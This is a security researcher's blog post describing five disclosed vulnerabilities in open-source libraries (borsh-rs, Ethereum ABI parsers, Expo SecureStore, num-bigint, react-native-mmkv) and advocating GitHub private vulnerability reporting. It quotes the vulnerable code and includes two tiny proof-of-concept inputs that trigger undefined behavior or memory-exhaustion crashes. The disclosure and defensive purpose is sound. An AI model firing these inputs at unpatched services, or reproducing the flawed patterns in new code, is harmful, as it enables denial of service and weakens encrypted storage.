By Max Ammann
This blog post showcases five examples of real-world vulnerabilities that we disclosed to maintainers in the past year (but have not written about publicly until now). We also share the frustrations we faced in disclosing them, to illustrate the need for effective disclosure processes.
Here are the five bugs:
- Undefined behavior in the borsh-rs Rust library
- Denial-of-service (DoS) vector in Rust libraries for parsing the Ethereum ABI
- Missing limit on authentication tag length in Expo
- DoS vector in the num-bigint Rust library
- Insertion of MMKV database encryption key into Android system log with react-native-mmkv
Discovering a vulnerability in an open-source project necessitates a careful approach, as publicly reporting it (also known as full disclosure) can alert attackers before a fix is ready. Coordinated vulnerability disclosure (CVD) uses a safer, structured reporting framework to minimize risks. Our five example cases demonstrate how the lack of a CVD process unnecessarily complicated reporting these bugs and ensuring their remediation in a timely manner.
In the Takeaways section, we show you how to set up your project for success by providing a basic security policy you can use and walking you through a streamlined disclosure process called GitHub private reporting. GitHub’s feature has several benefits:
- Discreet and secure alerts to developers: no need for PGP-encrypted emails
- Streamlined process: no playing hide-and-seek with company email addresses
- Simple CVE issuance: no need to file a CVE form at MITRE
Time for action: If you own well-known projects on GitHub, use private reporting today! Read more on Configuring private vulnerability reporting for a repository, or skip to the Takeaways section of this post.
Case 1: Undefined behavior in borsh-rs Rust library
The first case, and the reason for implementing a thorough security policy, concerned a bug in a cryptographic serialization library called borsh-rs that went unfixed for two years.
During an audit, I discovered unsafe Rust code that could cause undefined behavior if used with zero-sized types that don't implement the Copy trait. Even though somebody else had reported this bug previously, it was left unfixed because it was unclear to the developers how to avoid the undefined behavior while keeping the same properties (e.g., resistance against a DoS attack). During that time, the library's users were not informed about the bug.
The whole process could have been streamlined using GitHub’s private reporting feature. If project developers cannot address a vulnerability when it is reported privately, they can still notify Dependabot users about it with a single click. Releasing an actual fix is optional when reporting vulnerabilities privately on GitHub.
I reached out to the borsh-rs developers about notifying users while there was no fix available. The developers decided that it was best to notify users because only certain uses of the library caused undefined behavior. We filed the notification RUSTSEC-2023-0033, which created a GitHub advisory. A few months later, the developers fixed the bug, and the major release 1.0.0 was published. I then updated the RustSec advisory to reflect that the bug was fixed.
The following code contained the bug that caused undefined behavior:
```rust
impl<T> BorshDeserialize for Vec<T>
where
    T: BorshDeserialize,
{
    #[inline]
    fn deserialize<R: Read>(reader: &mut R) -> Result<Self, Error> {
        let len = u32::deserialize(reader)?;
        if size_of::<T>() == 0 {
            let mut result = Vec::new();
            result.push(T::deserialize(reader)?);
            let p = result.as_mut_ptr();
            unsafe {
                forget(result);
                let len = len as usize;
                let result = Vec::from_raw_parts(p, len, len);
                Ok(result)
            }
        } else {
            // TODO(16): return capacity allocation when we can safely do that.
            let mut result = Vec::with_capacity(hint::cautious::<T>(len));
            for _ in 0..len {
                result.push(T::deserialize(reader)?);
            }
            Ok(result)
        }
    }
}
```
Figure 1: Use of unsafe Rust (borsh-rs/borsh-rs/borsh/src/de/mod.rs#123–150)
The code in figure 1 deserializes bytes into a vector of some generic data type T. If the type T is a zero-sized type, then unsafe Rust code is executed. The code first reads the requested length for the vector as a u32. After that, it allocates an empty Vec and pushes a single instance of T into it. It then temporarily leaks the memory of the just-allocated Vec by calling the forget function and reconstructs the Vec by setting its length and capacity to the requested length. As a result, the unsafe Rust code assumes that T is copyable.
The unsafe Rust code protects against a DoS attack where the deserialized in-memory representation is significantly larger than the serialized on-disk representation. The attack works by setting the vector length to a large number and using zero-sized types. An instance of this bug is described in our blog post Billion times emptiness.
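To make the attack shape concrete, the following sketch (our illustration, not code from the advisory) shows how a four-byte payload could claim a vector of u32::MAX zero-sized elements. The Empty type is hypothetical, and the snippet assumes borsh 0.x's try_from_slice API:

```rust
use borsh::BorshDeserialize;

// Hypothetical zero-sized type that does NOT implement Copy, which is
// exactly the case that triggers the unsafe code path in figure 1.
#[derive(BorshDeserialize)]
struct Empty;

fn main() {
    // Borsh encodes a Vec's length as a little-endian u32 prefix. These
    // four bytes claim u32::MAX elements, with no element data following
    // (each element is zero-sized).
    let payload = u32::MAX.to_le_bytes();

    // Against a vulnerable borsh-rs version, this constructs a Vec whose
    // length and capacity are u32::MAX but whose backing allocation holds
    // a single element: undefined behavior for non-Copy zero-sized types.
    let result = Vec::<Empty>::try_from_slice(&payload);
    println!("deserialized: {}", result.is_ok());
}
```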
Case 2: DoS vector in Rust libraries for parsing the Ethereum ABI
In July, I disclosed multiple DoS vulnerabilities in four Ethereum ABI-parsing libraries, which were difficult to report because I had to reach out to multiple parties.
The bug affected four GitHub-hosted projects. Only the Python project eth_abi had GitHub private reporting enabled. For the other three projects (ethabi, alloy-rs, and ethereumjs-abi), I had to research who was maintaining them, which can be error-prone. For instance, I had to resort to the trick of getting maintainers' email addresses by appending the suffix .patch to GitHub commit URLs. The following link shows the non-work email address I used for committing: https://github.com/trailofbits/publications/commit/a2ab5a1cab59b52c4fa71b40dae1f597bc063bdf.patch
In summary, as the group of affected vendors grows, the burden on the reporter grows as well. Because you typically need to synchronize between vendors, the effort does not grow linearly but exponentially. Having more projects use the GitHub private reporting feature, a security policy with contact information, or simply an email address in the README file would streamline communication and reduce effort.
Read more about the technical details of this bug in the blog post Billion times emptiness.
Case 3: Missing limit on authentication tag length in Expo
In late 2022, Joop van de Pol, a security engineer at Trail of Bits, discovered a cryptographic vulnerability in expo-secure-store. In this case, the vendor, Expo, failed to follow up with us about whether they acknowledged or had fixed the bug, which left us in the dark. Even worse, trying to follow up with the vendor consumed a lot of time that could have been spent finding more bugs in open-source software.
When we initially emailed Expo about the vulnerability through the security address listed on its GitHub organization, an Expo employee responded within one day and confirmed that they would forward the report to their technical team. However, after that response, we never heard back from Expo despite two gentle reminders over the course of a year.
Unfortunately, Expo did not allow private reporting through GitHub, so that email address was the only contact we had.
Now to the specifics of the bug: on Android above API level 23, SecureStore uses AES-GCM keys from the KeyStore to encrypt stored values. During encryption, the tag length and initialization vector (IV) are generated by the underlying Java crypto library as part of the Cipher class and are stored with the ciphertext:
```java
/* package */ JSONObject createEncryptedItem(Promise promise, String plaintextValue,
    Cipher cipher, GCMParameterSpec gcmSpec,
    PostEncryptionCallback postEncryptionCallback)
    throws GeneralSecurityException, JSONException {

  byte[] plaintextBytes = plaintextValue.getBytes(StandardCharsets.UTF_8);
  byte[] ciphertextBytes = cipher.doFinal(plaintextBytes);
  String ciphertext = Base64.encodeToString(ciphertextBytes, Base64.NO_WRAP);

  String ivString = Base64.encodeToString(gcmSpec.getIV(), Base64.NO_WRAP);
  int authenticationTagLength = gcmSpec.getTLen();

  JSONObject result = new JSONObject()
      .put(CIPHERTEXT_PROPERTY, ciphertext)
      .put(IV_PROPERTY, ivString)
      .put(GCM_AUTHENTICATION_TAG_LENGTH_PROPERTY, authenticationTagLength);

  postEncryptionCallback.run(promise, result);
  return result;
}
```
Figure 2: Code for encrypting an item in the store, where the tag length is stored next to the ciphertext (SecureStoreModule.java)
For decryption, the ciphertext, tag length, and IV are read and then decrypted using the AES-GCM key from the KeyStore.
An attacker with access to the storage can change an existing AES-GCM ciphertext to have a shorter authentication tag. Depending on the underlying Java cryptographic service provider implementation, the minimum tag length is 32 bits in the best case (this is the minimum allowed by the NIST specification), but it could be even lower (e.g., 8 bits or even 1 bit) in the worst case. So in the best case, the attacker has a small but non-negligible probability that the same tag will be accepted for a modified ciphertext, but in the worst case, this probability can be substantial. In either case, the success probability grows depending on the number of ciphertext blocks. Also, both repeated decryption failures and successes will eventually disclose the authentication key. For details on how this attack may be performed, see Authentication weaknesses in GCM from NIST.
From a cryptographic point of view, this is an issue. However, due to the required storage access, it may be difficult to exploit this issue in practice. Based on our findings, we recommended fixing the tag length to 128 bits instead of writing it to storage and reading it from there.
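For contrast, here is a minimal sketch of a design with a fixed tag length, written with Rust's aes-gcm crate as an illustrative stand-in (the actual fix belongs in Expo's Java code). The crate hardcodes a 128-bit tag, so an attacker-controlled tag length read back from storage never enters the decryption path:

```rust
use aes_gcm::{
    aead::{Aead, KeyInit, OsRng},
    Aes256Gcm, Nonce,
};

fn main() {
    let key = Aes256Gcm::generate_key(OsRng);
    let cipher = Aes256Gcm::new(&key);
    // 96-bit nonce; must be unique per encryption under the same key.
    let nonce = Nonce::from_slice(b"unique nonce");
    let ciphertext = cipher
        .encrypt(nonce, b"secret value".as_ref())
        .expect("encryption failed");

    // The final 16 bytes of `ciphertext` are the 128-bit authentication tag.
    // Its length is fixed by the construction rather than stored alongside
    // the data, so a tampered "tag length" field has nothing to influence.
    let plaintext = cipher
        .decrypt(nonce, ciphertext.as_ref())
        .expect("decryption failed");
    assert_eq!(plaintext.as_slice(), b"secret value");
}
```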
The story would have ended here since we didn’t receive any responses from Expo after the initial exchange. But in our second email reminder, we mentioned that we were going to publicly disclose this issue. One week later, the bug was silently fixed by limiting the minimum tag length to 96 bits. Practically, 96 bits offers sufficient security. However, there is also no reason not to go with the higher 128 bits.
The fix was created exactly one week after our last reminder, so we suspect that the reminder prompted it, but we don't know for sure. Unfortunately, we were never credited appropriately.
Case 4: DoS vector in the num-bigint Rust library
In July 2023, Sam Moelius, a security engineer at Trail of Bits, encountered a DoS vector in the well-known num-bigint Rust library. Even though the disclosure through email worked very well, users were never informed about this bug through, for example, a GitHub advisory or CVE.
The num-bigint project is hosted on GitHub, but GitHub private reporting is not set up, so there was no quick way for the library author or us to create an advisory. Sam reported this bug to the developer of num-bigint by email. But finding the developer's email address is error-prone and takes time. Instead of sending the bug report directly, you must first confirm via email that you've reached the correct person and only then send out the bug details. With GitHub private reporting or a security policy in the repository, the channel for reporting vulnerabilities would be clear.
But now let's discuss the vulnerability itself. The library implements very large integers that no longer fit into primitive data types like i128. On top of that, the library can also serialize and deserialize those data types. The vulnerability Sam discovered was hidden in that serialization feature. Specifically, the library can crash due to large memory consumption or because the requested memory allocation is too large and fails.
The num-bigint types implement traits from Serde, which means that any type in the crate can be serialized and deserialized using an arbitrary file format, such as JSON or the binary format used by the bincode crate. The following example program shows how to use this deserialization feature:
```rust
use num_bigint::BigUint;
use std::io::Read;

fn main() -> std::io::Result<()> {
    let mut buf = Vec::new();
    let _ = std::io::stdin().read_to_end(&mut buf)?;
    let _: BigUint = bincode::deserialize(&buf).unwrap_or_default();
    Ok(())
}
```
Figure 3: Example program that deserializes a BigUint from standard input using bincode
It turns out that certain inputs cause the above program to crash. This is because the implementation of the Visitor trait uses untrusted user input to allocate a specific vector capacity. The following figure shows the lines that can cause the program to crash with the message "memory allocation of 2893606913523067072 bytes failed".
```rust
impl<'de> Visitor<'de> for U32Visitor {
    type Value = BigUint;

    {...omitted for brevity...}

    #[cfg(not(u64_digit))]
    fn visit_seq<S>(self, mut seq: S) -> Result<Self::Value, S::Error>
    where
        S: SeqAccess<'de>,
    {
        let len = seq.size_hint().unwrap_or(0);
        let mut data = Vec::with_capacity(len);

        {...omitted for brevity...}
    }

    #[cfg(u64_digit)]
    fn visit_seq<S>(self, mut seq: S) -> Result<Self::Value, S::Error>
    where
        S: SeqAccess<'de>,
    {
        use crate::big_digit::BigDigit;
        use num_integer::Integer;

        let u32_len = seq.size_hint().unwrap_or(0);
        let len = Integer::div_ceil(&u32_len, &2);
        let mut data = Vec::with_capacity(len);

        {...omitted for brevity...}
    }
}
```
Figure 4: Code that allocates memory based on user input (num-bigint/src/biguint/serde.rs#61–108)
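The crashing inputs can be tiny. As an illustration (our sketch, not the original proof of concept), and assuming bincode 1.x's default encoding, which prefixes sequences with a little-endian u64 length, eight bytes are enough to claim an enormous digit sequence:

```rust
use std::io::Write;

fn main() -> std::io::Result<()> {
    // Claim a sequence containing an absurd number of u32 digits without
    // providing any of them. Piped into the program from figure 3, this
    // reaches the Vec::with_capacity call in figure 4 and aborts the
    // process when the allocation fails.
    let claimed_len: u64 = u64::MAX / 8;
    std::io::stdout().write_all(&claimed_len.to_le_bytes())
}
```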
We initially contacted the author on July 20, 2023, and the bug was fixed in commit 44c87c1 on August 22, 2023. The fixed version, 0.4.4, was released the next day.
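The general mitigation follows a common pattern, sketched below (our illustration of the technique, not the literal patch): treat the serde size hint as advisory and cap the upfront allocation, so that untrusted input cannot force a huge allocation while genuinely long sequences still deserialize correctly.

```rust
use serde::de::SeqAccess;

// Assumed bound for illustration: preallocate at most 1 MiB upfront.
const MAX_PREALLOC_BYTES: usize = 1 << 20;

fn collect_digits<'de, S>(mut seq: S) -> Result<Vec<u64>, S::Error>
where
    S: SeqAccess<'de>,
{
    // The size hint is derived from untrusted input, so honor it only up
    // to a fixed cap; the Vec grows on its own if the sequence really is
    // that long.
    let hint = seq.size_hint().unwrap_or(0);
    let capacity = hint.min(MAX_PREALLOC_BYTES / std::mem::size_of::<u64>());
    let mut data = Vec::with_capacity(capacity);
    while let Some(digit) = seq.next_element::<u64>()? {
        data.push(digit);
    }
    Ok(data)
}
```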
Case 5: Insertion of MMKV database encryption key into Android system log with react-native-mmkv
The last case concerns the disclosure of a plaintext encryption key in the react-native-mmkv library, which was fixed in September 2023. During a secure code review for a client, I discovered a commit that fixed an untracked vulnerability in a critical dependency. Because there was no security advisory or CVE ID, neither I nor the client had been informed about the vulnerability. This lack of vulnerability management created a situation where attackers knew about a vulnerability while users were left in the dark.

During the client engagement, I wanted to validate how the encryption key was used and handled. The commit "fix: Don't leak encryption key in logs" in the react-native-mmkv library caught my attention. The following code shows the problematic log statement:
```cpp
MmkvHostObject::MmkvHostObject(const std::string& instanceId, std::string path,
                               std::string cryptKey) {
  __android_log_print(ANDROID_LOG_INFO, "RNMMKV",
                      "Creating MMKV instance \"%s\"... (Path: %s, Encryption-Key: %s)",
                      instanceId.c_str(), path.c_str(), cryptKey.c_str());
  std::string* pathPtr = path.size() > 0 ? &path : nullptr;
  {...omitted for brevity...}
```
Figure 5: Code that initializes MMKV and also logs the encryption key
Before that fix, the encryption key I was investigating was printed in plaintext to the Android system log. This breaks the threat model because this encryption key should not be extractable from the device, even with Android debugging features enabled.
With the client's agreement, I notified the author of react-native-mmkv, and the author and I concluded that the library users should be informed about the vulnerability. So the author enabled private reporting, and together we published a GitHub advisory. The ID CVE-2024-21668 was assigned to the bug. The advisory now alerts developers who use a vulnerable version of react-native-mmkv when they run npm audit or npm install.
This case highlights that there is basically no way around GitHub advisories when it comes to npm packages. The only way to get a vulnerability into the output of the npm audit command is to create a GitHub advisory. Using private reporting streamlines that process.
Takeaways
GitHub’s private reporting feature contributes to securing the software ecosystem. If used correctly, the feature saves time for vulnerability reporters and software maintainers. The biggest impact of private reporting is that it is linked to the GitHub advisory database—a link that is missing, for example, when using confidential issues in GitLab. With GitHub’s private reporting feature, there is now a process for security researchers to publish to that database (with the approval of the repository maintainers).
The disclosure process also becomes clearer with a private report on GitHub. When using email, it is unclear whether you should encrypt the email and who you should send it to. If you’ve ever encrypted an email, you know that there are endless pitfalls.
However, you may still want to send an email notification to developers or a security contact, as maintainers might miss GitHub notifications. A basic email with a link to the created advisory is usually enough to raise awareness.
Step 1: Add a security policy
Publishing a security policy is the first step towards owning a vulnerability reporting process. To avoid confusion, a good policy clearly defines what to do if you find a vulnerability.
GitHub has two ways to publish a security policy: you can either create a SECURITY.md file in the repository root, or create a user- or organization-wide policy by creating a .github repository and putting a SECURITY.md file in its root.
We recommend starting with a policy generated using the Policymaker by disclose.io (see this example), but replace the Official Channels section with the following:
We have multiple channels for receiving reports:
* If you discover any security-related issues with a specific GitHub project, click the *Report a vulnerability* button on the *Security* tab of the relevant GitHub project: https://github.com/[YOUR_ORG]/[YOUR_PROJECT].
* Send an email to security@[YOUR_DOMAIN].
Always make sure to include at least two points of contact. If one fails, the reporter still has another option before falling back to messaging developers directly.
Step 2: Enable private reporting
Now that the security policy is set up, check out the referenced GitHub private reporting feature, a tool that allows discreet communication of vulnerabilities to maintainers so they can fix the issue before it’s publicly disclosed. It also notifies the broader community, such as npm, Crates.io, or Go users, about potential security issues in their dependencies.
Enabling and using the feature is easy and requires almost no maintenance. The one thing you must get right is your GitHub notification settings: reports are delivered by email only if you have email notifications configured. The feature is not enabled by default because it requires active monitoring of your GitHub notifications; otherwise, reports may not get the attention they require.
After configuring the notifications, go to the "Security" tab of your repository and click "Enable vulnerability reporting." Emails about reported vulnerabilities have the subject line "(org/repo) Summary (GHSA-0000-0000-0000)"; if you use website notifications, a corresponding notification appears in your GitHub inbox.
If you want to enable private reporting for your whole organization, then check out this documentation.
A benefit of using private reporting is that vulnerabilities are published in the GitHub advisory database (see the GitHub documentation for more information). If repositories that depend on your project have Dependabot enabled, their dependencies on your project are updated automatically.
On top of that, GitHub can also automatically issue a CVE ID that can be used to reference the bug outside of GitHub.
This private reporting feature is still officially in beta on GitHub. We encountered minor issues like the lack of message templates and the inability of reporters to add collaborators. We reported the latter as a bug to GitHub, but they claimed that this was by design.
Step 3: Get notifications via webhooks
If you want notifications in a messaging platform of your choice, such as Slack, you can create a repository- or organization-wide webhook on GitHub. When creating the webhook, just enable the "Repository advisories" event type.
After creating the webhook, repository_advisory events will be sent to the configured webhook URL. The event payload includes the summary and description of the reported vulnerability.
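As a sketch of what consuming these events can look like, the following handler extracts a short notification message from the JSON payload (the field names follow GitHub's documented repository_advisory payload; verify them against the current docs):

```rust
use serde_json::Value;

/// Builds a short notification message from a repository_advisory webhook
/// payload, or returns None if the payload does not look like one.
fn advisory_notification(body: &str) -> Option<String> {
    let event: Value = serde_json::from_str(body).ok()?;
    let action = event.get("action")?.as_str()?; // e.g., "reported" or "published"
    let advisory = event.get("repository_advisory")?;
    let summary = advisory.get("summary")?.as_str()?;
    Some(format!("Advisory {action}: {summary}"))
}
```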
How to make security researchers happy
If you want to increase your chances of getting high-quality vulnerability reports from security researchers and are already using GitHub, then set up a security policy and enable private reporting. Simplifying the process of reporting security bugs is important for the security of your software. It also helps you avoid frustrating researchers, who might otherwise decide not to report a bug at all or, even worse, to turn the vulnerability into an exploit or release it as a 0-day.
If you use GitHub, this is your call to action to prioritize security, protect the public software ecosystem’s security, and foster a safer development environment for everyone by setting up a basic security policy and enabling private reporting.
If you're not a GitHub user, similar features exist on other issue-tracking systems, such as confidential issues in GitLab. However, not all systems have this option; Gitea, for instance, is missing such a feature. We focused on GitHub in this post because the platform is in a unique position due to its advisory database, which feeds into, for example, the npm package repository. But regardless of which platform you use, make sure that you have a visible security policy and reliable reporting channels set up.